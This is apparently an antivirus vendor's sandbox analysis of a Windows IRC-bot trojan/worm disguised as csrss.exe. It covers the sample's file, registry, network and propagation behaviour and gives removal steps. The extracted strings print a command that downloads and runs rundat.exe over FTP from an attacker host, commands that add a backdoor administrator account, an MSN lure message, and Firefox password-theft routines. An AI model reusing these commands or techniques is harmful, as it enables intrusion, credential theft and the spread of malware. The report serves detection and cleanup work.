MD5: 4bda0392ef9f56b8cffcd39320b0cb90
SHA1: 45502c60d30b71c5eb2077436032b8d563785edd
SHA256: b048ab800a58e5118dccab67e58d5739689b7de4962b17307467d64224aafbe7
SSDeep: 12288:9hkDgouVA2nxKkorvdRgQriDwOIxmxiZnYQE7PJcE4afWtkS rki9E292:LRmJkcoQricOIQxiZY1iafukS rHi
Size: 744752 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: QuickSet
Created at: 2012-01-29 23:32:28
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Process activity

The Trojan creates the following process(es):

%original file name%.exe:208
%original file name%.exe:160

The Trojan injects its code into the following process(es):
No processes have been created.

File activity

The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\csrss.exe (744752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

The process %original file name%.exe:160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (68608 bytes)
%Documents and Settings%\%current user%\B79C30.UN8 (67072 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\B79C30.UN8 (0 bytes)

Registry activity

The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 A5 3B 1B 0C 8A 0A D8 54 84 0B DF F5 25 C7 33"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"

The process %original file name%.exe:160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF F4 84 D4 B1 CC 95 32 A5 DE AD BB 35 4B 8A 71"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

Network activity (URLs)

URL	IP
hxxp://www.whatismyip.com/	190.93.248.117
hxxp://checkip.dyndns.com/
vids.p0rn-lover.us	82.145.57.211
checkip.dyndns.org	216.146.39.70

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CNC Shadowserver Reported CnC Server IP group 41
ET CNC Shadowserver Reported CnC Server IP group 40
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET POLICY Internal Host Retrieving External IP via whatismyip.com - Possible Infection
ET CHAT IRC PONG response
ET CHAT IRC PING command
ET TROJAN IRC Potential bot update/download via ftp command
ET CHAT IRC authorization message
ET POLICY DynDNS CheckIp External IP Address Server Response
ET SCAN Behavioral Unusual Port 445 traffic, Potential Scan or Infection

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

A worm can spread its copies through the MSN Messanger.

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 3, 8, 1
File Description:
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
09d12ffdac8192282a69f7a247e1addc

csrss.exe_752:
.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
PTF://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
hXXp://VVV.whatismyip.com
hXXp://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
192.168.25.167
"%local server name%"
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.
91.200.159.130

csrss.exe_752_rwx_00400000_0005A000:
.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
PTF://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
hXXp://VVV.whatismyip.com
hXXp://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
192.168.25.167
"%local server name%"
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.
91.200.159.130

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:208
   %original file name%.exe:160

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\csrss.exe (744752 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (68608 bytes)
   %Documents and Settings%\%current user%\B79C30.UN8 (67072 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Remote Registry Service" = "csrss.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.